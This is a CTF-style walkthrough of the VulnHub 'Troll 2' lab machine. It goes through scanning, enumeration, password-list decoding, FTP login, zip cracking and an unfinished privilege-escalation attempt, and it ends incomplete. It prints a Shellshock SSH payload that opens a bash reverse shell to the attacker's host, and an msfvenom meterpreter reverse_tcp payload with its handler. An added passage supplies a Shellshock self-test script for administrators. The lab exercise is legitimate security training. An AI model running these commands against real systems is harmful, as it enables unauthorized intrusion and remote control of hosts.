vulnhub-troll2...
forg12

Overview

Information gathering

Host discovery

nmap -sP 192.168.2.0/24                                                  
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-15 15:11 CST
Nmap scan report for 192.168.2.1
Host is up (0.0029s latency).

Nmap scan report for 192.168.2.169
Host is up (0.10s latency).

Port scanning

nmap -p- 192.168.2.169                                                   
Starting Nmap 7.92 ( https://nmap.org )
Nmap scan report for 192.168.2.169
Host is up (0.021s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 10.68 seconds

Service probing

Directory enumeration

dirsearch -u http://192.168.2.169/ -x 403


Robots.txt


dirsearch -u http://192.168.2.169/ -x 403 -w /home/kali/hk/troll2/url.txt 


[15:35:38] 301 -  313B  - /noob  ->  http://192.168.2.169/noob/             
[15:35:38] 301 - 320B - /keep_trying -> http://192.168.2.169/keep_trying/
[15:35:38] 301 - 322B - /ok_this_is_it -> http://192.168.2.169/ok_this_is_it/
[15:35:38] 301 - 320B - /dont_bother -> http://192.168.2.169/dont_bother/

All four paths serve the same image. Viewing the page source shows that the image file is named cat_the_troll.jpg.


wget http://192.168.2.169/noob/cat_the_troll.jpg
strings cat_the_troll.jpg

The downloaded image contained nothing useful, so I wondered whether one of the other images did and downloaded each of them in turn. The useful information turned out to be in the image under the fourth path.


/y0ur_self


The text is base64-encoded; download it and decode it to produce a password list.

cat answer.txt | base64 -d > dic.txt
cat dic.txt


FTP login

There is nowhere to use this dictionary yet, so I went back and logged in to FTP. The banner says this is Tr0ll FTP, so I tried Tr0ll/Tr0ll and it worked. If that had failed, the only remaining option would have been brute-forcing FTP or SSH.

ftp 192.168.2.169
Connected to 192.168.2.169.
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
Name (192.168.2.169:kali): Tr0ll
331 Please specify the password.
Password: Tr0ll
230 Login successful.


Extracting lmao.zip

After downloading it, the archive turned out to be password-protected, so I cracked it with the dictionary generated earlier.

fcrackzip -u -D -p /home/kali/hk/troll2/dic.txt lmao.zip


PASSWORD FOUND!!!!: pw == ItCantReallyBeThisEasyRightLOL


Exploitation

The archive contains an RSA private key, which can be used to log in directly.


Reverse shell

ssh -i noob noob@192.168.2.169 '() { :;}; bash -i >& /dev/tcp/192.168.2.168/2233 0>&1'
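The SSH command above is not an ordinary remote command. The writeup does not say why a plain `ssh -i noob` login did not yield a shell; the likely reason (an assumption here) is that the key is restricted by a forced command, so the command string is handed to the login shell only as the SSH_ORIGINAL_COMMAND environment variable, and an unpatched bash imports the `() { :;}; ...` function definition from that variable and executes the trailing code (the Shellshock bug). The script below is an added example, not part of the original writeup: it runs the standard local self-test for that bug so an administrator can confirm that the bash on a host is patched before trusting forced-command key restrictions.

```shell
#!/bin/sh
# Added example (not from the writeup): check whether the local bash still
# imports function definitions from environment variables, which is what the
# "() { :;}; bash -i ..." SSH command above relies on.
# Prints "vulnerable", "patched" or "no-bash" and always returns 0, so the
# verdict is read from the output rather than the exit status.
check_bash_function_import() {
    bash_bin="${1:-bash}"   # optional path to the bash binary to test
    if ! command -v "$bash_bin" >/dev/null 2>&1; then
        echo "no-bash"
        return 0
    fi
    # The variable name mimics what sshd sets for a forced-command key.
    # A vulnerable bash parses the value as a function and runs what follows
    # the function body; a patched bash ignores it (warnings go to stderr).
    out=$(SSH_ORIGINAL_COMMAND='() { :;}; echo SHELLSHOCKED' \
          "$bash_bin" -c 'echo probe' 2>/dev/null)
    case "$out" in
        *SHELLSHOCKED*) echo "vulnerable" ;;
        *)              echo "patched" ;;
    esac
    return 0
}

check_bash_function_import "$@"
```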


Listen for the reverse shell on Kali

nc -lvnp 2233


Privilege escalation

linpeas.sh

wget http://192.168.2.168:1111/linpeas.sh
chmod +x ./linpeas.sh
./linpeas.sh

I tried many things without success.

Privilege escalation with msf

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.2.172 lport=1122 -f elf >a.elf
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.2.172 yes The listen address (an interface
may be specified)
LPORT 1122 yes The listen port


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.2.172:1122
[*] Sending stage (989032 bytes) to 192.168.2.169
[*] Meterpreter session 1 opened (192.168.2.172:1122 -> 192.168.2.169:58803 )

meterpreter > getuid
Server username: noob


Running msf's local_exploit_suggester found only one module that looked like it might escalate privileges, exploit/linux/local/su_login; it failed when tried.

msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/su_login
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/local/su_login) > show options

Module options (exploit/linux/local/su_login):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Password to authenticate with
.
SESSION yes The session to run this modul
e on
USERNAME root yes Username to authenticate with
.


Payload options (linux/x86/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface
may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Linux x86


msf6 exploit(linux/local/su_login) > set session 1
session => 1
msf6 exploit(linux/local/su_login) > set lhost 192.168.2.172
lhost => 192.168.2.172
msf6 exploit(linux/local/su_login) > exploit

[*] Started reverse TCP handler on 192.168.2.172:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Uploading payload to target
[*] Attempting to login with su
[*] Exploit completed, but no session was created.


Buffer overflow

???